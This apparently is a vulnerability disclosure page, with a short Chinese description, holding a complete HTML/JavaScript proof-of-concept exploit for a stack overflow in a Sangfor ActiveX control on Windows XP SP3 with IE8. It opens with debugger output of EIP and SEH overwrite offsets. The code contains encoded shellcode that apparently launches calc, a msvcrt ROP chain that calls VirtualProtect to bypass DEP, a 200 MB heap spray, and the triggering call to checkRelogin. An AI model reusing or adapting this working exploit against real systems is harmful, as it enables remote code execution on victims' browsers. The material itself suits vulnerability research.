简要描述:[+] Looking for cyclic pattern in memory
Cyclic pattern (normal) found at 0x03750630 (length 1000 bytes)
Cyclic pattern (normal) found at 0x03750e66 (length 1000 bytes)
Cyclic pattern (normal) found at 0x03df203d (length 1000 bytes)
Cyclic pattern (normal) found at 0x03e54d1d (length 1000 bytes)
Cyclic pattern (normal) found at 0x016ad0ee (length 1000 bytes)
Cyclic pattern (unicode) found at 0x03745da4 (length 252 bytes)
Cyclic pattern (unicode) found at 0x03747e38 (length 1996 bytes)
Cyclic pattern (unicode) found at 0x03748d2e (length 999 bytes)
Cyclic pattern (unicode) found at 0x0407063a (length 999 bytes)
Cyclic pattern (unicode) found at 0x040c6236 (length 999 bytes)
Cyclic pattern (unicode) found at 0x040c6a64 (length 1996 bytes)
Cyclic pattern (unicode) found at 0x03e09bce (length 999 bytes)
EIP overwritten with normal pattern : 0x67413367 (offset 190)
ESP (0x016ad1b4) points at offset 198 in normal pattern (length 802)
EBP (0x016ad1ec) points at offset 254 in normal pattern (length 746)
[+] Examining SEH chain
SEH record (nseh field) at 0x016ad1c4 overwritten with normal pattern : 0x33684132 (offset 214), followed by 782 bytes of cyclic data
code 区域<html>
<head>
<title>Sangfor Activex stack overflow PoC bypass dep on xpsp3 ie8</title>
</head>
<body>
<!--[+] Looking for cyclic pattern in memory
Cyclic pattern (normal) found at 0x03710440 (length 1000 bytes)
Cyclic pattern (normal) found at 0x03710c76 (length 1000 bytes)
Cyclic pattern (normal) found at 0x00188a88 (length 16 bytes)
Cyclic pattern (normal) found at 0x03dedc28 (length 1000 bytes)
Cyclic pattern (normal) found at 0x03e52d10 (length 1000 bytes)
Cyclic pattern (normal) found at 0x016ad0ee (length 1000 bytes)
Cyclic pattern (unicode) found at 0x0409d632 (length 999 bytes)
Cyclic pattern (unicode) found at 0x040d6236 (length 999 bytes)
Cyclic pattern (unicode) found at 0x040d6a64 (length 1996 bytes)
Cyclic pattern (unicode) found at 0x03705d6c (length 252 bytes)
Cyclic pattern (unicode) found at 0x03707e00 (length 1996 bytes)
Cyclic pattern (unicode) found at 0x03708cf6 (length 999 bytes)
Cyclic pattern (unicode) found at 0x03e05fb4 (length 999 bytes)
EIP overwritten with normal pattern : 0x67413367 (offset 190)
ESP (0x016ad1b4) points at offset 198 in normal pattern (length 802)
EBP (0x016ad1ec) points at offset 254 in normal pattern (length 746)
[+] Examining SEH chain
SEH record (nseh field) at 0x016ad1c4 overwritten with normal pattern : 0x33684132 (offset 214), followed by 782 bytes of cyclic data
[+] Examining stack (entire stack) - looking for cyclic pattern
Walking stack from 0x0168f000 to 0x016afffc (0x00020ffc bytes)
0x016ad0f0 : Contains normal cyclic pattern at ESP-0xc4 (-196) : offset 2, length 998 (-> 0x016ad4d5 : ESP+0x322)
-->
<object classid="clsid257CF85-8E97-4C9B-8407-459B28006000" id='poc'></object>
<script>
// [ Shellcode ]
var shellcode = unescape('%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063');
var rop_chain = //"\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// "\uBE4B\u77BE" + // 0x77BEBE4B # pop ebp # retn [msvcrt.dll]
// "\u5ED5\u77BE" + // 0x77BE5ED5 # xchg eax, esp # retn [msvcrt.dll]
// "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// The real rop chain
"\ube4b\u77be" + // 0x77bebe4b : ,# POP EBP # RETN [msvcrt.dll]
"\ube4b\u77be" + // 0x77bebe4b : ,# skip 4 bytes [msvcrt.dll]
"\u6e9d\u77c1" + // 0x77c16e9d : ,# POP EBX # RETN [msvcrt.dll]
"\uE000\u0000" + // 0x0000E000 : ,# 0x0000E000-> ebx [dwSize]
"\ucdec\u77c1" + // 0x77c1cdec : ,# POP EDX # RETN [msvcrt.dll]
"\u0040\u0000" + // 0x00000040 : ,# 0x00000040-> edx
"\u79da\u77bf" + // 0x77bf79da : ,# POP ECX # RETN [msvcrt.dll]
"\uf67e\u77c2" + // 0x77c2f67e : ,# &Writable location [msvcrt.dll]
"\uaf6b\u77c0" + // 0x77c0af6b : ,# POP EDI # RETN [msvcrt.dll]
"\u9f92\u77c0" + // 0x77c09f92 : ,# RETN (ROP NOP) [msvcrt.dll]
"\u6f5a\u77c1" + // 0x77c16f5a : ,# POP ESI # RETN [msvcrt.dll]
"\uaacc\u77bf" + // 0x77bfaacc : ,# JMP [EAX] [msvcrt.dll]
"\u289b\u77c2" + // 0x77c2289b : ,# POP EAX # RETN [msvcrt.dll]
"\u1131\u77be" + // 0x77BE1131 : ,# ptr to &VirtualProtect() [IAT msvcrt.dll] 0x20-0xEF=0x31
"\u67f0\u77c2" + // 0x77c267f0 : ,# PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
"\u1025\u77c2"; // 0x77c21025 : ,# ptr to 'push esp # ret ' [msvcrt.dll]
// [ fill the heap with 0x0c0c0c0c ] About 0x2000 Bytes
var fill = "\u0c0c\u0c0c";
while (fill.length < 0x1000){
fill += fill;
}
// [ padding offset ]
padding = fill.substring(0, 0x5F6);
// [ fill each chunk with 0x1000 bytes ]
evilcode = padding + rop_chain + shellcode + fill.substring(0, 0x800 - padding.length - rop_chain.length - shellcode.length);
// [ repeat the block to 512KB ]
while (evilcode.length < 0x40000){
evilcode += evilcode;
}
// [ substring(2, 0x40000 - 0x21) - XP SP3 + IE8 ]
var block = evilcode.substring(2, 0x40000 - 0x21);
// [ Allocate 200 MB ]
var slide = new Array();
for (var i = 0; i < 400; i++){
slide = block.substring(0, block.length); } var junk = ''; while(junk.length<190) junk += 'A'; popeax = "\x28\x7b\x71\x7d";// 0x7d717b28 {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.6242 (C:\WINDOWS\system32\SHELL32.dll) xchg = "\x79\x68\x44\x3e"; //0x3e446879 {PAGE_EXECUTE_READ} [WININET.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v8.00.6001.19394 (C:\WINDOWS\system32\WININET.dll) str = "\x0c\x0c\x0c\x0c"; payload = junk + popeax + str +str +xchg; poc.checkRelogin(payload); </script> </body> </html>